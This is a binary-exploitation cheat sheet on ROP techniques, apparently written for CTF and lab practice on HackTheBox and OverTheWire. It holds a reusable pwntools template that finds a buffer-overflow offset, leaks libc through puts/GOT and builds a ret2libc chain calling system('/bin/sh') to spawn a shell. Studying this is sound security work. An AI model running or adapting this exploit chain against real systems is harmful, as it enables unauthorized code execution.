# ropchain

- hints
1) ret2ret
2) ret2text
3) ret2shellcode
4) ret2syscall
5) ret2libc
6) ret2dl-resolve
7) ret2__libc_csu_init
8) ret2reg
9) ret2_dl_runtime_resolve
10) ret2VDSO -
11) srop - signal Frame is stored in the user's address space, so the user can read and write. the kernel is not related to the signal handler (kernel agnostic about signal handlers), it does not record the Signal Frame corresponding to the signal. Therefore, when the sigreturn system call is executed, the Signal Frame at this time is not necessarily the previous kernel as the user process. The saved Signal Frame.
12) brop - server-side process restarts after a crash, and the restarted process has the same address as the previous address (that is, even if the program has ASLR protection, it only works when the program is initially started). Currently, server applications such as nginx, MySQL, Apache, and OpenSSH are compatible with this feature.


#### CONNECTION
``` python
# template.py
from pwn import * # Import pwntools

LOCAL = True
REMOTETTCP = False
REMOTESSH = False
GDB = False

local_bin = "./vuln"
remote_bin = "~/vuln" # For ssh
libc = "" # ELF("/lib/x86_64-linux-gnu/libc.so.6") # Set library path when know it

if LOCAL:
    p = process(local_bin) # start the vuln binary
    elf = ELF(local_bin)# Extract data from binary
    rop = ROP(elf)# Find ROP gadgets

elif REMOTETTCP:
    p = remote('docker.hackthebox.eu',31648) # start the vuln binary
    elf = ELF(local_bin)# Extract data from binary
    rop = ROP(elf)# Find ROP gadgets

elif REMOTESSH:
    ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
    p = ssh_shell.process(remote_bin) # start the vuln binary
    elf = ELF(local_bin)# Extract data from binary
    rop = ROP(elf)# Find ROP gadgets


if GDB and not REMOTETTCP and not REMOTESSH:
    # attach gdb and continue
    # You can set breakpoints, for example "break *main"
    gdb.attach(p.pid, "continue")
```


#### Find offset
``` python
OFFSET = ""#"A"*72
if OFFSET == "":
    gdb.attach(p.pid, "c") #Attach and continue
    payload = cyclic(1000)
    print(p.clean())
    p.sendline(payload)
    #x/wx $rsp -- Search for bytes that crashed the application
    #cyclic_find(0x6161616b) # Find the offset of those bytes
    p.interactive()
    exit()
```


#### Find Gadgets
``` python
try:
    PUTS_PLT = elf.plt['puts'] # PUTS_PLT = elf.symbols["puts"] # This is also valid to call puts
except:
    PUTS_PLT = elf.plt['printf']
MAIN_PLT = elf.symbols['main']
POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0] # Same as ROPgadget --binary vuln | grep "pop rdi"

log.info("Main start: " + hex(MAIN_PLT))
log.info("Puts plt: " + hex(PUTS_PLT))
log.info("pop rdi; ret  gadget: " + hex(POP_RDI))

def get_addr(func_name):
    FUNC_GOT = elf.got[func_name]
    log.info(func_name + " GOT @ " + hex(FUNC_GOT))
    # Create rop chain
    rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)

    # Send our rop-chain payload
    #p.sendlineafter("dah?", rop1) # Interesting to send in a specific moment
    print(p.clean()) # clean socket buffer (read all and print)
    p.sendline(rop1)

    # Parse leaked address
    recieved = p.recvline().strip()
    leak = u64(recieved.ljust(8, "\x00"))
    log.info("Leaked libc address,  " +func_name+ ": " + hex(leak))
    # If not libc yet, stop here
    if libc != "":
        libc.address = leak - libc.symbols[func_name] # Save libc base
        log.info("libc base @ %s" % hex(libc.address))

    return hex(leak)

get_addr("puts") # Search for puts address in memmory to obtains libc base
if libc == "":
    print("Find the libc library and continue with the exploit... (https://libc.blukat.me/)")
    p.interactive()
```

Notice that if a libc was specified the base of the library will be saved in libc.address this implies that in the future if you search for functions in libc, the resulting address will be the real one, you can use it directly (NOT NEED TO ADD AGAIN THE LIBC BASE ADDRESS)


#### GET SHELL with known LIBC
``` python
BINSH = next(libc.search("/bin/sh")) # Verify with find /bin/sh
SYSTEM = libc.sym["system"]
EXIT = libc.sym["exit"]

log.info("bin/sh %s " % hex(BINSH))
log.info("system %s " % hex(SYSTEM))

rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT)

p.clean()
p.sendline(rop2)

##### Interact with the shell #####
p.interactive() # Interact with the conenction
```

### mprotect
- sick_rop (HTB)
- https://hackmd.io/@imth/SROP

### resources
- https://github.com/nnamon/PracticalRet2Libc
- https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html
- https://ret2rop.blogspot.com/2018/08/return-to-libc.html
- https://gist.github.com/anvbis/64907e4f90974c4bdd930baeb705dedf

### tools
- https://github.com/ropfuscator/ropfuscator
